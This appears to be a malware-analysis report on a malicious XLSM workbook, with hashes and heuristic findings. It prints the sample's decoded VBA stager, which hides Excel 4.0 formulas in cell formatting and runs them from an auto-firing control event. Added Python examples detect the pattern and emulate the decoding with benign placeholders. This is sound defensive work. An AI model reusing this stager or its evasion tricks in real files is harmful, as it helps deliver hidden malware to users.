Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 6db3fb73eeb0e48a…

MALICIOUS

Office (OOXML) / .XLSM

Size: 52.3 KB
Created: 2020-10-26 10:25:43 UTC
Authoring application: 16.0300
First seen: 2020-11-05
MD5: 7366a263a3e7bdcbbee25e9d532ac241
SHA-1: f2e12e47d66675e94ba0c2b91c29fba5d538a046
SHA-256: 6db3fb73eeb0e48a6b961d101ddc3db4b78430fc3ebe0fa1e9889b28d03efdd4
Risk Score: 120

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution

The sample is an XLSM workbook carrying a VBA project. Heuristics indicate that the VBA code rebuilds an Excel 4.0 (XLM) macro from obfuscated data and launches it through ExecuteExcel4Macro, triggered from a Frame control's Layout event rather than a conventional AutoOpen/Workbook_Open handler. That bridge is commonly used to download and execute a follow-on payload, so the sample is assessed with high confidence as a downloader or dropper stage; the findings point to macro behaviour, not to a document-parser vulnerability.

Heuristics (3)

  • VBA project inside OOXML [medium] (rule OOXML_VBA, 2 related findings)
    Document contains a VBA project (VBA macros present).
  • VBA ActiveX event launches decoded Excel4 macro [critical] (rule OLE_VBA_ACTIVEX_XLM_STAGER)
    VBA code attached to an auto-firing ActiveX/UserForm control event (e.g. _Layout/_Change/_Painted) decodes a string with Replace/Split/Join/StrReverse/Chr and passes the recovered formula text to ExecuteExcel4Macro. This bridges VBA event activation into XLM formula execution to call Win32 APIs / drop payloads while evading AutoOpen and Shell keyword detection — a high-confidence macro stager, not a specific Office parser CVE.
    Matched line in script:
      ExecuteExcel4Macro Replace(Ss, "?", pipo)
  • OOXML VBA project hides Excel 4 macro execution bridge [high] (rule OOXML_VBA_XLM_BRIDGE_RAW)
    Raw vbaProject.bin metadata references ExecuteExcel4Macro together with string-deobfuscation primitives, and the OOXML package exposes a button, drawing, or control surface that can invoke VBA. This is a macro/XLM stager indicator for projects whose source cannot be recovered cleanly; it is not a document-parser CVE attribution.
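The OLE_VBA_ACTIVEX_XLM_STAGER logic described above, reimplemented as an added example (this is not the report engine's own rule code): parse the decoded VBA into procedures, start from every auto-firing control event handler (the page's _Layout/_Change/_Painted set), follow plain-name calls transitively, and flag an ExecuteExcel4Macro call reachable from that handler when string-deobfuscation primitives are also reachable. SAMPLE_VBA is a constructed copy of the Sheet1 module shown later on this page; the regexes are deliberately loose triage heuristics, not a VBA parser.

```python
import re
from dataclasses import dataclass

# Control events that fire without user interaction once the sheet/form renders
# (the set the page's heuristic names; extend it for other auto-firing events).
AUTO_EVENTS = ("Layout", "Change", "Painted")
# String-deobfuscation primitives the heuristic expects alongside ExecuteExcel4Macro.
DEOBFUSCATION = ("Chr", "Join", "Replace", "Split", "StrReverse")

PROC_RE = re.compile(
    r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(\w+)\s*\([^)]*\)(.*?)^\s*End\s+(?:Sub|Function)",
    re.S | re.M | re.I,
)
# Attribute VB_Control = "<name>, ..." declares a control whose events the sheet module handles.
CONTROL_RE = re.compile(r'^\s*Attribute\s+VB_Control\s*=\s*"(\w+)\s*,', re.M)

# Constructed copy of the Sheet1 module extracted from this sample (see macros.bas below).
SAMPLE_VBA = r'''
Attribute VB_Name = "Sheet1"
Attribute VB_Control = "xerox, 25, 0, MSForms, Frame"
Sub vermont()
For Each s In ActiveSheet.UsedRange.SpecialCells(xlCellTypeVisible)
If s.NumberFormat = 0 Then k = k + Chr(s.Column)
Next
t = Split(k, "=")
nemer = Split(t(0), "!")
namer = t(1)
Randomize: pipo = nemer(Int((59 - 0 + 1) * Rnd + 0))
ecgho = Split(namer, "!")
For Each Ss In ecgho
ExecuteExcel4Macro Replace(Ss, "?", pipo)
Next
jo = 9: oj = jo: ActiveWorkbook.Close oj - jo: jo = 7
End Sub
Private Sub xerox_Layout()
epson: vermont
End Sub
Sub epson()
ut = 43
End Sub
'''


@dataclass
class Finding:
    rule: str
    severity: str
    event_handler: str      # auto-firing event procedure that starts the chain
    declared_control: bool  # handler prefix matches an Attribute VB_Control entry
    call_chain: tuple       # procedures from the handler to the ExecuteExcel4Macro caller
    primitives: tuple       # deobfuscation primitives seen in reachable code
    matched_line: str


def parse_procedures(src):
    """Map every Sub/Function name in the module text to its body."""
    return {m.group(1): m.group(2) for m in PROC_RE.finditer(src)}


def reachable_from(procs, start):
    """BFS over plain-name calls; returns {procedure: caller}, caller None for the root.
    A name inside a string literal also counts: this is triage, not a parser."""
    parents, queue = {start: None}, [start]
    while queue:
        cur = queue.pop(0)
        for callee in procs:
            if callee not in parents and re.search(rf"\b{re.escape(callee)}\b", procs[cur], re.I):
                parents[callee] = cur
                queue.append(callee)
    return parents


def scan(src):
    """Apply the stager heuristic to decoded VBA source; returns a list of Finding."""
    procs = parse_procedures(src)
    controls = set(CONTROL_RE.findall(src))
    findings = []
    for handler in procs:
        ctrl, sep, event = handler.rpartition("_")
        if not sep or event not in AUTO_EVENTS:
            continue
        parents = reachable_from(procs, handler)
        body = "\n".join(procs[p] for p in parents)
        prims = tuple(p for p in DEOBFUSCATION if re.search(rf"\b{p}\s*\(", body, re.I))
        for proc in parents:
            for line in procs[proc].splitlines():
                if prims and re.search(r"\bExecuteExcel4Macro\b", line, re.I):
                    chain, cur = [], proc
                    while cur is not None:          # walk back to the event handler
                        chain.append(cur)
                        cur = parents[cur]
                    findings.append(Finding(
                        rule="OLE_VBA_ACTIVEX_XLM_STAGER", severity="critical",
                        event_handler=handler, declared_control=ctrl in controls,
                        call_chain=tuple(reversed(chain)), primitives=prims,
                        matched_line=line.strip()))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_VBA):
        print(f"{f.severity.upper()} {f.rule}: {' -> '.join(f.call_chain)} | {f.matched_line}")
```

On this sample the scanner reports one critical finding with the chain xerox_Layout -> vermont, the primitives Chr, Replace and Split, and the same matched line the report shows. Feed it the output of olevba (one module at a time) to reproduce the check on other files; a module with only AutoOpen and no event handler produces no finding, which is exactly the gap this rule closes.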

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1160 bytes
SHA-256: fcadffc723e48604b191a52df437faabbc19ec95e4194d1051b94ecf3dee1209
Script preview (decoded VBA source; the 1,000-line preview cap is not reached):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "xerox, 25, 0, MSForms, Frame"
Sub vermont()
For Each s In ActiveSheet.UsedRange.SpecialCells(xlCellTypeVisible)
If s.NumberFormat = 0 Then k = k + Chr(s.Column)
Next
t = Split(k, "=")
nemer = Split(t(0), "!")
namer = t(1)
Randomize: pipo = nemer(Int((59 - 0 + 1) * Rnd + 0))
ecgho = Split(namer, "!")
For Each Ss In ecgho
ExecuteExcel4Macro Replace(Ss, "?", pipo)
Next
jo = 9: oj = jo: ActiveWorkbook.Close oj - jo: jo = 7
End Sub
Private Sub xerox_Layout()
epson: vermont
End Sub
Sub epson()
ut = 43
End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 10752 bytes
SHA-256: 86cb60cc030899946c32c8030d1e139b5a1eb63c7eb8233519a6fbeb56b98c2e
emf_00.emf | ooxml-emf | OOXML EMF part: xl/media/image1.emf | 2024 bytes
SHA-256: 8357e7f07f41a1e53a6ef35edda5f8d6ef14c676e025cb302cff4e47f3ae55a8
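How the vermont() routine in the extracted script recovers its XLM text, emulated as an added example (not code from the sample or the report): the payload is not stored as text at all but as cell formatting, one character per "0"-formatted cell whose column index is the character code, read back in row-major order over visible cells only. The real Sheet1 cell data is not on this page, so the sheet, the 60 candidate names and the two benign XLM formulas below are constructed placeholders; nothing is executed, the function only returns what would be handed to ExecuteExcel4Macro.

```python
import random

# Constructed stand-in for the sample's Sheet1. The names and formulas are placeholders,
# not the real payload; "?" is the slot the macro fills with a randomly chosen name.
NAMES = [f"name{i:02d}" for i in range(60)]   # Int((59 - 0 + 1) * Rnd + 0) indexes 0..59
FORMULAS = ['ALERT("?")', "HALT()"]           # benign XLM standing in for the real list
PAYLOAD = "!".join(NAMES) + "=" + "!".join(FORMULAS)


def build_sheet(payload, stride=2):
    """Return ({(row, col): number_format}, hidden_rows): one payload character per
    visible row (column = character code, format "0"), plus two kinds of noise the
    macro ignores: a visible "General" cell and a "0" cell in a hidden row."""
    cells, hidden = {}, set()
    for i, ch in enumerate(payload):
        row = stride * (i + 1)
        cells[(row, ord(ch))] = "0"           # carries the character
        cells[(row, 1)] = "General"           # visible, but wrong format: skipped
        cells[(row - 1, ord("#"))] = "0"      # right format, but hidden row: skipped
        hidden.add(row - 1)
    return cells, hidden


def walk_visible(cells, hidden_rows=frozenset(), hidden_cols=frozenset()):
    """Emulate For Each s In ActiveSheet.UsedRange.SpecialCells(xlCellTypeVisible)."""
    out = []
    for (row, col) in sorted(cells):          # Excel enumerates the range row by row
        if row in hidden_rows or col in hidden_cols:
            continue
        if cells[(row, col)] == "0":          # If s.NumberFormat = 0 Then k = k + Chr(s.Column)
            out.append(chr(col))
    return "".join(out)


def decode(k, rng=random):
    """Emulate the rest of vermont(): returns (chosen name, formula strings that would
    be passed to ExecuteExcel4Macro). The workbook would then close without saving
    (ActiveWorkbook.Close oj - jo, where 9 - 9 = 0 = False)."""
    t = k.split("=")                          # t = Split(k, "=")
    nemer = t[0].split("!")                   # nemer = Split(t(0), "!"): candidate names
    namer = t[1]                              # namer = t(1): formulas between the first two "="
    idx = int(60 * rng.random())              # Int((59 - 0 + 1) * Rnd + 0)
    if idx >= len(nemer):                     # VBA would raise run-time error 9 here
        raise IndexError("Subscript out of range: fewer than 60 names encoded")
    pipo = nemer[idx]
    return pipo, [ss.replace("?", pipo) for ss in namer.split("!")]


if __name__ == "__main__":
    cells, hidden = build_sheet(PAYLOAD)
    name, formulas = decode(walk_visible(cells, hidden_rows=hidden), random.Random(1))
    print(name, formulas)
```

The hidden-row decoys matter in practice: a naive dump of every cell with number format "0" (for example walking an openpyxl worksheet without checking row_dimensions[...].hidden and column_dimensions[...].hidden) yields a corrupted string, because SpecialCells(xlCellTypeVisible) skips them. To run this against the real workbook, build the cells dictionary from cell.number_format of each used cell and the hidden flags of its row and column, then call walk_visible and decode exactly as above.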